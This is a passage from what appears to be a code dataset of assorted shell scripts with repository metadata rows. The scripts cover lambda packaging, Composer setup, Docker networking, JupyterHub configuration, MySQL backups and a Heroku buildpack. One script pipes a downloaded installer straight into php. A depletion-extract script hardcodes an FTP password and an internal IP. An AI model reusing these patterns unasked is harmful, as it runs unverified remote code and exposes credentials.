echo "File doesen't exist";
exit 3;
fi
| true
|
c762103b1720f2dc73d9311bbf8257d6380fa6bd
|
Shell
|
moggiez/auth
|
/scripts/package_all.sh
|
UTF-8
| 292
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/bash
# Package every Cognito-trigger lambda under CODE_DIR into a zip in DIST_DIR
# via the shared build_and_package_lambda.sh helper.
CODE_DIR=$PWD/code/cognito_triggers
DIST_DIR=$PWD/dist
LAMBDAS=("custom_message" "post_confirmation")

for lambda in "${LAMBDAS[@]}"; do
    echo "Building lambda '$lambda'..."
    $PWD/scripts/build_and_package_lambda.sh $CODE_DIR/$lambda $DIST_DIR ${lambda}.zip
    echo ""
done
| true
|
6d9010646367ec69ff4ad2efa3fb561471454ae7
|
Shell
|
nixsolutions/ggf
|
/bin/composer.sh
|
UTF-8
| 536
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Bootstrap/refresh a project-local composer.phar next to this script, then
# run `composer install` (or `update`) for the project one directory up.
# Usage: composer.sh <env> [update]  — an <env> containing "live" uses --no-dev.
#
# All $DIR expansions are quoted so paths containing spaces work.
DIR="$( cd "$( dirname "$0" )" && pwd )"
# First run: download composer; otherwise self-update the existing phar.
if [ ! -f "$DIR/composer.phar" ]
then
    curl -sS https://getcomposer.org/installer | php -- --install-dir="$DIR"
else
    php "$DIR/composer.phar" self-update --profile
fi
php "$DIR/composer.phar" -V
php "$DIR/composer.phar" diagnose --profile
# Second argument selects the composer action; anything except "update"
# falls back to "install".
action="$2"
if [ "$action" != "update" ]
then
    action=install
fi
# First argument picks the environment flavour.
case "$1" in
    *live*) dev="--no-dev" ;;
    *) dev="--dev" ;;
esac
php "$DIR/composer.phar" "$action" "$dev" --prefer-dist --optimize-autoloader --working-dir "$DIR/.." --profile
| true
|
2b4125c4a98c0096dcb66f6fddafdcd4f487a964
|
Shell
|
minedec/vtools
|
/app/src/main/assets/kr-script/apps/cloudmusic_ad_set.sh
|
UTF-8
| 559
| 3.015625
| 3
|
[] |
no_license
|
#!/system/bin/sh
# unlock_dir PATH — clear the immutable attribute on PATH and delete it.
# "$1" is quoted so paths with spaces survive, and the busybox fallback only
# runs when $BUSYBOX is set (the original ran plain `chattr` twice when it
# was empty).
function unlock_dir() {
    chattr -i "$1" 2> /dev/null
    if [ -n "$BUSYBOX" ]; then
        $BUSYBOX chattr -i "$1" 2> /dev/null
    fi
    rm -rf "$1" 2> /dev/null
}
# lock_dir PATH — replace PATH with an empty immutable placeholder file so
# the app cannot recreate or write into it. Quotes "$1" and guards the
# busybox fallback like unlock_dir (the original ran plain `chattr` twice
# when $BUSYBOX was empty).
function lock_dir() {
    unlock_dir "$1"
    echo "" > "$1"
    chattr +i "$1" 2> /dev/null
    if [ -n "$BUSYBOX" ]; then
        $BUSYBOX chattr +i "$1" 2> /dev/null
    fi
}
# Toggle NetEase Cloud Music ad-cache blocking.
# Assumes $state (toggle value) and $SDCARD_PATH (storage root) are exported
# by the kr-script frontend — TODO confirm.
# state "0" locks the ad directories; any other value restores them.
if [[ "$state" = "0" ]]; then
lock_dir "$SDCARD_PATH/netease/cloudmusic/Ad"
lock_dir "$SDCARD_PATH/Android/data/com.netease.cloudmusic/cache/Ad"
else
unlock_dir "$SDCARD_PATH/netease/cloudmusic/Ad"
unlock_dir "$SDCARD_PATH/Android/data/com.netease.cloudmusic/cache/Ad"
fi
| true
|
44fb944cc87d85fb7f6c092d3df87ba6f0889a68
|
Shell
|
gakaya/initial_sys_config
|
/copy_files.sh
|
UTF-8
| 120
| 2.53125
| 3
|
[] |
no_license
|
# Install treeprint.sh into DEST and expose it under the short name LINK.
DEST=/usr/local/bin
FILE=treeprint.sh
LINK=treeprint
# Abort if the copy fails (e.g. missing source or no permission); the
# original chmod'd/linked regardless.
cp "$FILE" "$DEST" || exit 1
chmod +x "$DEST/$FILE"
# -sfn replaces an existing link so the script can be re-run; plain `ln -s`
# failed with "File exists" on the second run.
ln -sfn "$DEST/$FILE" "$DEST/$LINK"
| true
|
01781f556b9a527a00238ce3ffb897839da45a42
|
Shell
|
karthickramalingam/dc-on-docker-li
|
/utils/docker-network-host.sh
|
UTF-8
| 7,230
| 3.546875
| 4
|
[] |
no_license
|
#! /usr/bin/env bash
# Build the emulated datacenter topology (fabric/core/leaf switches plus two
# hosts) out of docker networks and veth pairs.
# Docker picks the default network based on the network name
# in the alphabetical order. We put this prefix to all the
# network names so that those networks won't to be picked
# as the default networks.
#
# https://github.com/docker/docker/issues/21741
net_prefix="znet"
create_network_namespace()
{
    # Expose each container's network namespace to `ip netns` by symlinking
    # /proc/<pid>/ns/net into /var/run/netns.
    #
    # The original wrapped every `ln -s` in $(...), which executed ln's
    # (empty) output as a command — a pointless extra step; it also repeated
    # the same loop four times, once per container family.
    mkdir -p /var/run/netns
    local name
    for name in fab0{5..8} csw0{1..8} asw0{1..4} host{1..2}; do
        pid="$(docker inspect -f '{{.State.Pid}}' ${name})"
        ln -s /proc/${pid}/ns/net /var/run/netns/${pid}
    done
}
# create fabric networks
create_fabric_networks()
{
    # Create the four fabric subnets 10.0.41.0/24 .. 10.0.44.0/24, skipping
    # any network that already exists. Testing `docker network inspect`
    # directly replaces the fragile `$?`-after-redirect check.
    for i in {1..4}; do
        if ! docker network inspect ${net_prefix}41${i} > /dev/null; then
            docker network create \
                --subnet=10.0.4${i}.0/24 \
                --gateway=10.0.4${i}.254 ${net_prefix}41${i}
        fi
    done
}
# create leaf networks
create_leaf_networks()
{
    # Create the four leaf subnets 10.0.51.0/24 .. 10.0.54.0/24, skipping
    # any network that already exists. Testing `docker network inspect`
    # directly replaces the fragile `$?`-after-redirect check.
    for i in {1..4}; do
        if ! docker network inspect ${net_prefix}51${i} > /dev/null; then
            docker network create \
                --subnet=10.0.5${i}.0/24 \
                --gateway=10.0.5${i}.254 ${net_prefix}51${i}
        fi
    done
}
# connect fabric switch
connect_fabric_switches()
{
    # Wire each fabric switch (fab05..fab08) to every core switch
    # (csw01..csw08) with a veth pair, moving each end into the matching
    # container's network namespace and bringing it up.
    #
    # BUG FIX: the original ran `docker inspect`, then a `declare`, and only
    # then tested $? — so the guard checked declare's status (always 0) and
    # the existence test never worked. The inspect result is now tested
    # directly.
    for j in {5..8}; do
        if docker inspect fab0${j} > /dev/null; then
            declare cswPortID="eth$((j - 4))"
            declare fabPID="$(docker inspect -f '{{.State.Pid}}' fab0${j})"
            for i in {1..8}; do
                if docker inspect csw0${i} > /dev/null; then
                    declare fabPortID="eth${i}"
                    declare cswPID="$(docker inspect -f '{{.State.Pid}}' csw0${i})"
                    ip link add ${fabPortID}A type veth peer name ${cswPortID}B
                    ip link set ${fabPortID}A netns ${fabPID}
                    ip netns exec ${fabPID} ip link set ${fabPortID}A name ${fabPortID}
                    ip netns exec ${fabPID} ip link set ${fabPortID} up
                    ip link set ${cswPortID}B netns ${cswPID}
                    ip netns exec ${cswPID} ip link set ${cswPortID}B name ${cswPortID}
                    ip netns exec ${cswPID} ip link set ${cswPortID} up
                fi
            done
        fi
    done
}
# connect spine switch
connect_spine_switches()
{
    # Wire core switches to aggregation switches with veth pairs:
    # csw01..csw04 <-> asw01..asw02, then csw05..csw08 <-> asw03..asw04.
    #
    # BUG FIX: as in connect_fabric_switches, the original tested $? after an
    # intervening `declare`, so the container-existence guard was always
    # true. The `docker inspect` result is now tested directly.
    for j in {1..4}; do
        if docker inspect csw0${j} > /dev/null; then
            declare aswPortID="eth${j}"
            declare cswPID="$(docker inspect -f '{{.State.Pid}}' csw0${j})"
            for i in {1..2}; do
                if docker inspect asw0${i} > /dev/null; then
                    declare cswPortID="eth$((i + 4))"
                    declare aswPID="$(docker inspect -f '{{.State.Pid}}' asw0${i})"
                    ip link add ${cswPortID}A type veth peer name ${aswPortID}B
                    ip link set ${cswPortID}A netns ${cswPID}
                    ip netns exec ${cswPID} ip link set ${cswPortID}A name ${cswPortID}
                    ip netns exec ${cswPID} ip link set ${cswPortID} up
                    ip link set ${aswPortID}B netns ${aswPID}
                    ip netns exec ${aswPID} ip link set ${aswPortID}B name ${aswPortID}
                    ip netns exec ${aswPID} ip link set ${aswPortID} up
                fi
            done
        fi
    done
    for j in {5..8}; do
        if docker inspect csw0${j} > /dev/null; then
            declare aswPortID="eth$((j - 4))"
            declare cswPID="$(docker inspect -f '{{.State.Pid}}' csw0${j})"
            for i in {3..4}; do
                if docker inspect asw0${i} > /dev/null; then
                    declare cswPortID="eth$((i + 2))"
                    declare aswPID="$(docker inspect -f '{{.State.Pid}}' asw0${i})"
                    ip link add ${cswPortID}A type veth peer name ${aswPortID}B
                    ip link set ${cswPortID}A netns ${cswPID}
                    ip netns exec ${cswPID} ip link set ${cswPortID}A name ${cswPortID}
                    ip netns exec ${cswPID} ip link set ${cswPortID} up
                    ip link set ${aswPortID}B netns ${aswPID}
                    ip netns exec ${aswPID} ip link set ${aswPortID}B name ${aswPortID}
                    ip netns exec ${aswPID} ip link set ${aswPortID} up
                fi
            done
        fi
    done
}
# connect servers to fabric networks
# Attach host1 and the fabric switches fab05..fab08 to the four fabric
# docker networks; no-op when host1 does not exist.
connect_servers_to_fabric_networks()
{
docker inspect host1 > /dev/null
if [ $? = 0 ]; then
docker network connect ${net_prefix}411 fab05
docker network connect ${net_prefix}412 fab06
docker network connect ${net_prefix}413 fab07
docker network connect ${net_prefix}414 fab08
docker network connect ${net_prefix}411 host1
docker network connect ${net_prefix}412 host1
docker network connect ${net_prefix}413 host1
docker network connect ${net_prefix}414 host1
fi
}
# connect servers to leaf networks
# Attach host2 and the aggregation switches asw01..asw04 to the four leaf
# docker networks; no-op when host2 does not exist.
connect_servers_to_leaf_networks()
{
docker inspect host2 > /dev/null
if [ $? = 0 ]; then
docker network connect ${net_prefix}511 asw01
docker network connect ${net_prefix}512 asw02
docker network connect ${net_prefix}513 asw03
docker network connect ${net_prefix}514 asw04
docker network connect ${net_prefix}511 host2
docker network connect ${net_prefix}512 host2
docker network connect ${net_prefix}513 host2
docker network connect ${net_prefix}514 host2
fi
}
# main
# Only the docker-network based wiring is active; the namespace/veth steps
# are currently disabled (commented out).
#create_network_namespace
create_fabric_networks
create_leaf_networks
#connect_fabric_switches
#connect_spine_switches
connect_servers_to_fabric_networks
connect_servers_to_leaf_networks
| true
|
6f8cf3cf892410f8127dd712126b62eeb42f5439
|
Shell
|
crcerror/ES-generic-shutdown
|
/install.sh
|
UTF-8
| 963
| 2.90625
| 3
|
[] |
no_license
|
# Automatik install of multi_switch.sh script
# Thanks to @neo954 for some script code

# Check for SU/ROOT: compare the numeric UID instead of $USER, which can be
# unset or stale in some sudo/cron environments.
[[ $(id -u) -ne 0 ]] && echo "Need root privileges... just run with 'sudo $0'" && exit 1

# Install package raspi-gpio
apt-get install -y raspi-gpio

# Create directories and download scripts; abort if the cd fails so we never
# chmod/chown in the wrong place.
mkdir -p /home/pi/RetroPie/scripts
cd /home/pi/RetroPie/scripts || exit 1
wget -N -q --show-progress https://raw.githubusercontent.com/crcerror/ES-generic-shutdown/master/multi_switch.sh

# Set user rights
chmod +x multi_switch.sh
chown -R pi:pi ../scripts

# Create auto startup: drop any stale line first, then prepend the new one.
sed -i -e '/\/home\/pi\/RetroPie\/scripts\/multi_switch.sh/ d' -e '1i /home/pi/RetroPie/scripts/multi_switch.sh --nespi+ &' /opt/retropie/configs/all/autostart.sh

# This is shutdown script, it seems to be used in some bare cases
cd /lib/systemd/system-shutdown || exit 1
wget -N -q --show-progress https://raw.githubusercontent.com/crcerror/ES-generic-shutdown/master/shutdown_fan
chmod +x shutdown_fan
| true
|
240dcc0c03a7fea37baf75c08cb2554b9bfda708
|
Shell
|
EWouters/jns
|
/scripts/conf_jupyterhub.sh
|
UTF-8
| 1,220
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# script name: conf_jupyterhub.sh
# last modified: 2019/09/01
# credits: EWouters
# sudo: yes
#
# Generates /etc/jupyterhub/jupyterhub_config.py and patches a fixed set of
# configuration keys so JupyterHub spawns single-user servers from the jns
# virtualenv.

script_name=$(basename -- "$0")
env="/home/pi/.venv/jns"

if ! [ $(id -u) = 0 ]; then
    echo "usage: sudo ./$script_name"
    exit 1
fi

# if jupyterhub directory exists, we keep it (-p)
# if configuration file exists, we overwrite it (-y)

# Make folder to store config
mkdir -p /etc/jupyterhub
cd /etc/jupyterhub || exit 1

# Generate Config
$env/bin/jupyterhub -y --generate-config

target=/etc/jupyterhub/jupyterhub_config.py

# set up dictionary of changes for jupyterhub_config.py
declare -A arr
app='c.Spawner'
arr+=(["$app.cmd = "]="$app.cmd = ['$env/bin/jupyterhub-singleuser']")
arr+=(["$app.default_url = "]="$app.default_url = 'lab'")
arr+=(["$app.notebook_dir = "]="$app.notebook_dir = '/home/pi/notebooks'")
arr+=(["c.Authenticator.admin_users = "]="c.Authenticator.admin_users = {'pi'}")

# apply changes to jupyterhub_config.py
# BUGFIX: the keys contain spaces, so both the loop expansion and the grep
# argument must be quoted; unquoted they word-split and every lookup fails.
for key in "${!arr[@]}"; do
    if grep -qF "$key" "$target"; then
        # key found -> replace line
        sed -i "/${key}/c ${arr[${key}]}" "$target"
    else
        # key not found -> append line
        echo "${arr[${key}]}" >> "$target"
    fi
done
| true
|
b5ad9e0aa136027bda3b685dbd6d9fbed44e69b9
|
Shell
|
kipelovets/GeekPartyAnsible
|
/roles/mysql/templates/mysql_dump.sh
|
UTF-8
| 306
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# Nightly MySQL dump: write a dated full dump into the backup directory and
# gzip it. Rendered by a template engine; {{ ... }} placeholders are
# substituted at deploy time.

USER={{ mysql_db_user }}
PASSWORD={{ mysql_db_password }}
BACKUP_PATH="{{ backup_dir }}"

DATE=$(date +"%Y-%m-%d")
TARGET_FILE="$BACKUP_PATH/mysqldump-$DATE.sql"

# printf instead of plain echo: echo without -e printed the "\n" literally.
printf 'Writing dump to %s\n' "$TARGET_FILE"
mysqldump --user=$USER --password=$PASSWORD --all-databases > "$TARGET_FILE"
gzip -v -f "$TARGET_FILE"
| true
|
18bb91ccad93800b3e610ad6cf0b0fd87c135fac
|
Shell
|
ayyfish/heroku-buildpack-tesseract
|
/bin/compile
|
UTF-8
| 844
| 3.1875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Heroku buildpack compile step: unpack the bundled Tesseract-OCR tarball
# into the slug and emit a .profile.d script that exposes it at runtime.

BUILD_DIR=$1

TESSERACT_OCR_VERSION=4.1.0
TESSERACT_OCR_TGZ=tesseract-ocr-$TESSERACT_OCR_VERSION.tar.gz
TESSERACT_FOLDER_NAME=tesseract-ocr-$TESSERACT_OCR_VERSION
INSTALL_DIR=$BUILD_DIR/vendor/tesseract-ocr/
TESSERACT_OCR_DIR=${HOME}/vendor/tesseract-ocr
ENVSCRIPT=$BUILD_DIR/.profile.d/tesseract-ocr.sh
TESSERACT_OCR_LANGUAGES=eng

echo "Unpacking Tesseract-OCR binaries"
mkdir -p $INSTALL_DIR
tar -zxvf $TESSERACT_OCR_TGZ -C $INSTALL_DIR

echo "Building runtime environment for Tesseract-OCR"
mkdir -p $BUILD_DIR/.profile.d
# Write all three exports in one grouped redirection.
{
  echo "export PATH=\"$TESSERACT_OCR_DIR/$TESSERACT_FOLDER_NAME/bin:\$PATH\""
  echo "export LD_LIBRARY_PATH=\"$TESSERACT_OCR_DIR/$TESSERACT_FOLDER_NAME/lib:\$LD_LIBRARY_PATH\""
  echo "export TESSDATA_PREFIX=\"$TESSERACT_OCR_DIR/$TESSERACT_FOLDER_NAME/share/tessdata\""
} > $ENVSCRIPT
| true
|
fb6de28aebeb1e92a6b4eda20ee256a21070cd49
|
Shell
|
stefanbuck/all-packages
|
/script/release
|
UTF-8
| 305
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Release helper: rebuild the package list, commit the dependency bump,
# cut a minor version and publish it to npm.

npm install --only=dev
npm run build

# The build step leaves the dependency count in a throwaway "count" file.
count=$(< count)
rm count

git add package.json
git config user.email "os@stefanbuck.com"
git config user.name "Stefan Buck"
git commit -m "Now with $count dependencies"

npm version minor -m "bump minor to %s"
npm publish
git push origin master --follow-tags
| true
|
638be2c80dbbe1996ab6c34b84526bcd2c8ed7d5
|
Shell
|
Skrilltrax/dotfiles
|
/macos/apps/install_apps
|
UTF-8
| 143
| 3.15625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Run every entry in this script's directory, one after another.
# NOTE(review): the glob also matches this script itself — confirm that is
# intended (it was the original behaviour too).

# Resolve the directory containing this file, following symlinks (-P).
here="$(cd -P "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

for entry in "$here"/*; do
  bash -c "$entry"
done
| true
|
ad7e21e8754ce0167dac5e1d46986e88f9f08c4f
|
Shell
|
bopopescu/first-1
|
/100doors
|
UTF-8
| 85
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
# Toggle a value between 0 and 1 for each word iterated over.
# BUGFIX: the original was missing the closing "fi" (a hard syntax error,
# so the script never parsed) and tested the literal word "i" instead of
# "$i". Both are fixed below.
# NOTE(review): the loop still iterates over the literal word "list", which
# looks like an unfinished exercise — confirm the intended input.
for i in list
do
	if [ "$i" -eq 0 ]
	then i=1
	else
		i=0
	fi
done
| true
|
37c165ae7ec628429aa25e32eab47c079137ba7a
|
Shell
|
SOliasS/Ender5plusSKRv1.3
|
/Marlin-bugfix-2.0.x/Marlin-bugfix-2.0.x/buildroot/bin/env_backup
|
UTF-8
| 414
| 3.40625
| 3
|
[
"MIT",
"GPL-3.0-only",
"GPL-1.0-or-later"
] |
permissive
|
#!/usr/bin/env bash
# Snapshot the Marlin configuration (plus optional boot/status screens and
# the pins tree) into a hidden .test directory, unless one already exists.
# Optional $1: directory to operate in.

if [ -n "$1" ]; then
  cd $1
fi

if [ -d ".test" ]; then
  printf "\033[0;31mEnvironment backup already exists!\033[0m\n"
else
  mkdir .test
  cp Marlin/Configuration*.h .test/
  # The boot/status screens are optional; copy them only when present.
  for screen in _Bootscreen.h _Statusscreen.h; do
    [ -f "Marlin/$screen" ] && cp "Marlin/$screen" .test/
  done
  cp -r Marlin/src/pins .test/pins
  printf "\033[0;32mEnvironment Backup created\033[0m\n"
fi
| true
|
738c34b52c50fe24fcf14f6fae1c3e8202d33d86
|
Shell
|
FauxFaux/debian-control
|
/t/tuxtype/tuxtype_1.8.3-3_amd64/postinst
|
UTF-8
| 752
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e

# Debian maintainer script (postinst) for tuxtype; dpkg calls it with
# $1 = "configure" on (re)installation.
if [ "$1" = "configure" ]; then
    # Remove the legacy /usr/doc compatibility symlink once the real docs
    # live under /usr/share/doc.
    if [ -d /usr/doc -a -h /usr/doc/tuxtype -a -d /usr/share/doc/tuxtype ]; then
        rm -f /usr/doc/tuxtype
    fi
    # make tuxtype binary and shared wordlist directory setgid games
    # and allow admin to override this decission
    # (dpkg-statoverride --list exits non-zero when no override exists,
    # in which case we register the default one)
    dpkg-statoverride --list /usr/games/tuxtype >/dev/null || \
    dpkg-statoverride --update --add root games 2755 /usr/games/tuxtype
    dpkg-statoverride --list /var/games/tuxtype/words >/dev/null || \
    dpkg-statoverride --update --add root games 2775 /var/games/tuxtype/words
fi

# Automatically added by dh_installmenu/11.3.2
if [ "$1" = "configure" ] && [ -x "`which update-menus 2>/dev/null`" ]; then
    update-menus
fi
# End automatically added section
| true
|
ca04a4550bcfbee7e0df9b46e9303bca48eefeb2
|
Shell
|
fcitx/mozc
|
/scripts/install_server
|
UTF-8
| 341
| 2.6875
| 3
|
[
"BSD-3-Clause",
"NAIST-2003",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unicode"
] |
permissive
|
#!/bin/sh
# Install the mozc server/tool binaries and HTML docs under $PREFIX.
# _bldtype selects the build flavour (defaults to Debug).

_bldtype=${_bldtype:-Debug}
PREFIX="${PREFIX:-/usr}"

for bin in mozc_server mozc_tool; do
    install -D -m 755 "out_linux/${_bldtype}/${bin}" "${PREFIX}/lib/mozc/${bin}"
done

install -d "${PREFIX}/share/doc/mozc/"
install -m 644 data/installer/*.html "${PREFIX}/share/doc/mozc/"
| true
|
5414fd26fb56eaed917b3ca16ff13b773e0a5b81
|
Shell
|
rocktan001/webrtc
|
/mediadevices/dockerfiles/build.sh
|
UTF-8
| 204
| 3.265625
| 3
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Build one docker image per *.Dockerfile in this directory, tagged
# ${OWNER}/cross-<name>.

cd $(dirname $0)

OWNER=lherman
PREFIX=cross  # kept for compatibility; the tag below hardcodes "cross-"

# Glob directly instead of parsing `ls` output; filenames containing
# whitespace or glob characters would otherwise be mangled.
for image in *.Dockerfile
do
    tag=${OWNER}/cross-${image//.Dockerfile/}
    docker build -t "${tag}" -f "$image" .
done
| true
|
9d1352437d2e050f3ddeba9c3eb56189cf47e60f
|
Shell
|
oslab-ewha/simtbs
|
/mkload.sh
|
UTF-8
| 560
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# Generate simtbs configuration files: one mkload.conf.NNN per workload
# intensity in WORKLOADS, produced via `simtbs -g` from a shared template.

WORKLOADS="125 120 115 110 105 100 90 80 70 60 50 40 30 20 10"
SIMTBS=`dirname $0`/simtbs

# gen_conf FILE WORKLOAD
#   Write the simtbs config template to FILE with the *workload line set to
#   "WORKLOAD 12-128 5-20". The heredoc body is the literal template.
function gen_conf() {
	cat <<EOF > $1
*general
10000
*sm
16 8
*mem
15000
*overhead_mem
500 1.2
1000 2.4
2000 3.6
3000 4.8
4000 6.0
5000 7.2
6000 8.4
7000 9.6
8000 10.8
9000 12.0
10000 13.2
15000 14
*workload
$2 12-128 5-20
*overhead_sm
2 0.1
3 0.11
4 0.12
5 0.13
6 0.14
7 0.15
8 0.16
EOF
}

# Render each per-workload config through a throwaway template file that is
# unique to this process ($$), then clean it up.
conftmpl=.simtbs.tmpl.conf.$$
for wl in $WORKLOADS
do
	gen_conf $conftmpl $wl
	$SIMTBS -g `printf mkload.conf.%03d $wl` $conftmpl
done
rm -f $conftmpl
| true
|
9740103269917d5084942f93f2c507e077af72af
|
Shell
|
Unity3DMobileAlbatron/DATAUNITY3D
|
/Servercode/installserviced.sh
|
UTF-8
| 614
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
# Build serviced.jar and copy its artifacts/config into serverbin/serviced.
# BUGFIX: the shebang was #!/bin/sh, but the script uses bash-only features
# (the `function` keyword and [[ ]]), which breaks on dash/POSIX sh.

# isok STATUS DESCRIPTION — abort with an error message when STATUS is
# non-zero, otherwise report success.
function isok() {
    ret=$1
    action="$2"
    [[ $ret -ne 0 ]] && echo "ERROR!!!!,$action" && exit 1
    echo "OK!!!!,$action" && return 0
}

# docmd CMD — echo, run (via eval) and verify a command string.
function docmd() {
    cmd=$1
    echo $cmd
    eval "$cmd"
    isok $? "$cmd"
}

cd `dirname $0`
cd serviced
docmd "./build.sh"
cd -
docmd "cp -f serviced/serviced.jar serverbin/serviced/"
#docmd "cp -f serviced/serviced.xio.xml serverbin/template_release/serviced/"
#docmd "cp -f serviced/serviced.config.xml serverbin/serviced/"
docmd "cp -f serviced/coder.ServiceServer.xml serverbin/serviced/"
docmd "rsync -azcp serviced/config serverbin/serviced/"
| true
|
4f7a5458016c7308415d1acd73d7f7276f585a29
|
Shell
|
belongcai/SHELL_FUCKER
|
/do_tac.bash
|
UTF-8
| 212
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
# Demonstrate two ways of reversing line order:
#   1. the tac utility
#   2. an awk script that buffers all lines and prints them backwards
seq 9 | tac
echo "**************"
seq 9 | \
awk '
{
    buf[NR] = $0
    last = NR
}
END{
    for (; last > 0; last--)
    {
        print buf[last]
    }
}'
| true
|
819b13d0282a9cb513777739cf893e7957412811
|
Shell
|
bdingee/DW
|
/bw_depletion_extract.sh
|
UTF-8
| 6,310
| 3.5
| 4
|
[] |
no_license
|
#!/bin/sh
###############################################################################
# $Header: /dwa/cvsrepo/dev/depletion/bin/bw_depletion_extract.sh,v 1.17 2019/07/17 18:26:20 bdingee Exp $
# $Revision: 1.17 $
# $Name: PRD $
#
# Description : create depl & Inventory extract file for NA01, NA07, NA02 for BW
#
# MODIFICATION HISTORY
# Person Date Comments
# --------- -------- ----------------------------------------
#
################################################################################
#set -x
#------------------------------------------------
# REQUIRED CODE
#------------------------------------------------
subject=depletion
batch_key=516
# FTP credentials and destination for the BW server.
USER=bpmdsp1
PASSWORD=bpmdsp199
SITE=10.114.55.103
SUBDIR=Depletion
# include common shell functions
. $DW_BIN/dw_common_scripts.sh
# setup runtime environment for subject
dw_setup_env $subject
dw_check_for_error -s "dw_setup_env" -e "$?"
# move to the work directory
cd $DW_DATA_WORK
export TMPDIR=$DW_DATA_WORK # TMPDIR need to set to $DW_DATA_WORK because default is /tmp
#------------------------------------------------
# END - REQUIRED CODE
#------------------------------------------------
#
# start batch
#
dw_start_run_shell $batch_key
dw_check_for_error -s "dw_start_run_shell" -e "$?"
echo " --------------- sqlplus - load extract tables "
echo " Start: `date`"
sql="bw_depletions_extract_pkg.load;"
dw_sqlplus -p "$sql"
dw_check_for_error -s "dw_sqlplus" -e "$?"
echo " End: `date`"
echo " "
# One pass per extract type; each produces a timestamped CSV for BW.
for file in depletion inventory
do
  # Map the extract type to its BW file-name prefix (+ timestamp).
  case $file in depletion) cleanfile="DPDCDNAM`date +%Y%m%d%H%M%S`"
    ;;
    inventory) cleanfile="DPDCINAM`date +%Y%m%d%H%M%S`"
    ;;
    *) continue
    ;;
  esac
  sql="@$DW_SUBJECT_SQL/bw_${file}_extract_daily.sql"
  outfile=`mktemp -p $DW_DATA_WORK`
  if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
  then
    # NOTE(review): "$?" passed to -e here is the status of the [ ] test
    # above, not of mktemp; the same pattern repeats below — the reported
    # code may not be the failing command's. Confirm before relying on it.
    dw_check_for_error -s "mktemp" -m "mktemp failed" -e "$?"
  fi
  echo "--------------- sqlplus - run extract process for $file "
  echo " Start: `date`"
  dw_sqlplus -o $outfile "$sql"
  if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
  then
    dw_check_for_error -s "dw_sqlplus" -e "$?"
  fi
  echo " End: `date`"
  echo " "
  # cleanup file here
  echo "--------------- clean - Clean up output file"
  echo " Start: `date`"
  #
  # only get lines that begin with a #, then remove the #
  # make sure any " inside " are ""
  #
  grep '^[[:space:]]*#' $outfile | sed -e 's/^[[:space:]]*#//' -e 's/\([^,]\)"\([^,]\)/\1""\2/' > $cleanfile.csv
  if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
  then
    dw_check_for_error -s "cleanup" -m "Cleaning of file failed" -e "$?"
  fi
  echo " End: `date`"
  echo " "
  #FTP the file to BW PRD only if we are running it from DW PRD Server AND SendFTP flag=Y
  machine=`hostname`
  if [ "$machine" = "nwkdwprd1" -o "$machine" = "nwkdwprd4" ]
  then
    echo " "
    echo "--------------- FTP the data file"
    dw_ftp -u $USER -p $PASSWORD -d $SITE -s $SUBDIR -m ASCII -c put "$cleanfile.csv"
    if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
    then
      dw_check_for_error -s "FTP" -m "FTP Error" -e "$?"
    fi
  else
    echo " "
    echo "--------------- DID NOT FTP as $machine is not the PRD Server"
  fi
  echo " End: `date`"
  echo " "
  # cleanup: compress the CSV and archive it in the outbound directory.
  gzip $cleanfile.csv
  mv $cleanfile.csv.gz $DW_DATA_OUTBOUND_DEPLETION
  echo "Archive data file..."
  echo " "
  dw_archive_file -d "$DW_DATA_OUTBOUND_DEPLETION/$cleanfile.csv.gz"
  dw_check_for_error -s "dw_archive_file" -e "$?"
done
#Put the trigger file.
trigFile=Depletion.trig
touch $trigFile
if [ "$machine" = "nwkdwprd1" -o "$machine" = "nwkdwprd4" ]
then
  echo " "
  echo "--------------- FTP the trigger file"
  dw_ftp -u $USER -p $PASSWORD -d $SITE -s $SUBDIR -m ASCII -c put "$trigFile"
  if [ "$?" -ne "$DW_RETURN_SUCCESS" ]
  then
    dw_check_for_error -s "FTP" -m "FTP Error Trigger File" -e "$?"
  fi
fi
echo " End: `date`"
echo " "
echo " --------------- sqlplus - update date table"
echo " Start: `date`"
sql="bw_depletions_extract_pkg.update_run_table;"
dw_sqlplus -p "$sql"
dw_check_for_error -s "dw_sqlplus" -e "$?"
echo " End: `date`"
echo " "
#
# finish batch - SUCCESSFUL
#
dw_finish_run_shell -s -r $DW_RUN_KEY $DW_BATCH_KEY
dw_check_for_error -s "dw_finish_run_shell" -e "$?"
echo " "
echo " "
echo "**********************************************************************"
echo "--------------- Completed Successfully"
echo "**********************************************************************"
exit $DW_RETURN_SUCCESS
| true
|
eb5c63990c6114e7329cf9ba6ec92e0c9f73910e
|
Shell
|
endlesselectron/bin
|
/cloud9.sh
|
UTF-8
| 3,424
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/sh
# Provision a Cloud9 IDE container wired to a per-project workspace volume.
# Parses --project-name/--email/--name/--upstream/--origin/--parent value
# pairs, creates docker volumes, seeds them with generated init/shell
# scripts (via volume-tee.sh) and finally starts the cloud9 container.
# The whole script is one && chain: any failing step stops the rest.

# ---- parse "--flag value" argument pairs --------------------------------
while [ ${#} -gt 1 ]
do
case ${1} in
--project-name)
PROJECT_NAME=${2} &&
shift &&
shift &&
true
;;
--email)
EMAIL=${2} &&
shift &&
shift &&
true
;;
--name)
NAME=${2} &&
shift &&
shift &&
true
;;
--upstream)
UPSTREAM=${2} &&
shift &&
shift &&
true
;;
--origin)
ORIGIN=${2} &&
shift &&
shift &&
true
;;
